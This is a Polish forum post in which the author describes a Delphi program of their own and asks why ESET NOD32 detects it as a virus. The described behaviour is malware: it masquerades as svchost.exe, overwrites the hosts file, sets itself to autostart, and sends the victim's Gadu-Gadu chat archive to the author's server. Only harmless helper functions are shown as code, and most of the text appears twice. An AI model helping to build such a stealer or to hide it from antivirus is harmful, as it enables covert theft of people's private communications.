Witam, w programie wykrywa mi rootkida na moim drugim kompie z tym samym AV i WinXP SP3.
Wyświetla mi błąd o sygnaturze "ModName: kernel32.dll ModVer: 5.1.2600.5781 Offset: 00012afb"
Program działa następująco:
1. KOPIOWANIE I SPRAWDZANIE APLIKACJI do Windows dir. pod nazwa svchost.exe (Jeśli nie ma daje ją tam, jeśli jest o innym rozmiarze, podmienia)
2. KOPIOWANIE I SPRAWDZANIE PLIKU HOSTS do Windows dir. pod nazwa SynthCoreC.Dll i kopiowanie do folderu gdzie powinien być hosts w oryginalnej nazwie. (Jeśli nie ma daje ją tam, jeśli jest o innym rozmiarze, podmienia)
3. ZAPISYWANIE W REJESTRZE DO AUTOSTARTU dodaje pod nazwą "Diagnostic" do "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
4. WYSYŁANIE ARCHWIUM GG 10 ZA POMOCĄ METODY POST sprawdza, czy jest plik w podanej ścieżce jeśli jest wysyła go na mój ftp za pomocą HttpPostFile (Tego nie wykonuje na drugim kompie, czyli przed tym wyświetla się Problem z aplikacją (windowsowy)
5. WYŚWIETLA PRZY PIERWSZYM STARCIE WIADOMOŚĆ.
Co może być przyczyną zablokowania aplikacji i wykrywania przez ESET NOD32 jako wirusa?
Posiadam takie funkcje:
Używam: FileExists(GetSpecialFolderPath(CSIDL_APPDATA) + '\Gadu-Gadu 10\nr\Archive.db')
Używam modułów: Forms,
SysUtils,
Windows,
Registry,
Classes,
httpsend, // wysyła archiwum GG
UrlMon, // pobiera plik SynthCoreC.Dll z ftp
ShlObj; // potrzebny do pobierania sciezek z win (np. %appdata% dla GG)
Wyświetla mi błąd o sygnaturze "ModName: kernel32.dll ModVer: 5.1.2600.5781 Offset: 00012afb"
Program działa następująco:
1. KOPIOWANIE I SPRAWDZANIE APLIKACJI do Windows dir. pod nazwa svchost.exe (Jeśli nie ma daje ją tam, jeśli jest o innym rozmiarze, podmienia)
2. KOPIOWANIE I SPRAWDZANIE PLIKU HOSTS do Windows dir. pod nazwa SynthCoreC.Dll i kopiowanie do folderu gdzie powinien być hosts w oryginalnej nazwie. (Jeśli nie ma daje ją tam, jeśli jest o innym rozmiarze, podmienia)
3. ZAPISYWANIE W REJESTRZE DO AUTOSTARTU dodaje pod nazwą "Diagnostic" do "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
4. WYSYŁANIE ARCHWIUM GG 10 ZA POMOCĄ METODY POST sprawdza, czy jest plik w podanej ścieżce jeśli jest wysyła go na mój ftp za pomocą HttpPostFile (Tego nie wykonuje na drugim kompie, czyli przed tym wyświetla się Problem z aplikacją (windowsowy)
5. WYŚWIETLA PRZY PIERWSZYM STARCIE WIADOMOŚĆ.
Co może być przyczyną zablokowania aplikacji i wykrywania przez ESET NOD32 jako wirusa?
Posiadam takie funkcje:
Kod:
//-----------------------------------------------//
// FUNCKJA SPRAWDZANIA ROZMIARU PLIKU //
//-----------------------------------------------//
function SizeOfFile(AFileName : string) : LongWord;
var FileHandle : THandle;
begin
Result := 0;
if FileExists(AFileName) then
begin
FileHandle := CreateFile(PChar(AFileName), GENERIC_READ, 0, nil, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0);
Result := GetFileSize(FileHandle, nil);
CloseHandle(FileHandle);
end;
end;
//-----------------------------------------------//
// FOLDER "DANE APLIKACJI" I JEGO ŚCIEŻKA //
//-----------------------------------------------//
function GetSpecialFolderPath(const Folder: Integer): string;
var
Path: array[0..MAX_PATH] of Char;
begin
SHGetSpecialFolderPath(0, Path, Folder , False);
Result := Path;
end;
//-----------------------------------------------//
// POBIERANE DANE DO WYPISANIA W TEKSCIE //
//-----------------------------------------------//
function StreamToString(aStream: TStream): string;
var
SS: TStringStream;
begin
if aStream <> nil then
begin
SS := TStringStream.Create('');
try
SS.CopyFrom(aStream, 0); // No need to position at 0 nor provide size
Result := SS.DataString;
finally
SS.Free;
end;
end
else
begin
Result := '';
end;
end;
Używam: FileExists(GetSpecialFolderPath(CSIDL_APPDATA) + '\Gadu-Gadu 10\nr\Archive.db')
Używam modułów: Forms,
SysUtils,
Windows,
Registry,
Classes,
httpsend, // wysyła archiwum GG
UrlMon, // pobiera plik SynthCoreC.Dll z ftp
ShlObj; // potrzebny do pobierania sciezek z win (np. %appdata% dla GG)